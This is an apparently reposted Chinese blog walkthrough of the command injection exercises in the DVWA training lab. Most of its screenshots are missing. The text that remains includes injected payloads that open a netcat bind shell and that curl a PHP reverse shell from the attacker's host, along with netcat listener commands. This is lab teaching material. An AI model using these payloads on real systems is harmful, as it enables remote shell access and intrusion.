DVWA-命令执行

Posted joker-vip

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DVWA-命令执行相关的知识,希望对你有一定的参考价值。

开门见山

 

·Low

 技术图片

 

 技术图片

 

 技术图片

 

 技术图片

 

 技术图片

 

 

·Medium

技术图片

 

 技术图片

 

 技术图片

 

 

·High

技术图片

 

 

· 命令执行监听端口

;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe

nc 192.168.31.100 4444

 

· 反弹shell

拷贝shell文件

 技术图片

 

 

启动kaliapache服务

 技术图片

 

 

修改shell文件

 技术图片

 

 

命令执行漏洞执行shell

;curl http://192.168.31.52/1.php

 技术图片

 

 

Kali打开侦听

nc -nvvlp 1234

 技术图片

 

 

执行命令后接收到监听

 技术图片

 

 

 

以上是关于DVWA-命令执行的主要内容,如果未能解决你的问题,请参考以下文章

DVWA平台v1.9-Command Injection

DVWA篇二:命令注入

命令注入和DVWA命令注入实例

php命令注入函数及dvwa命令注入实践

常见WEB攻击之命令注入

DVWA:Command Injection 全等级命令注入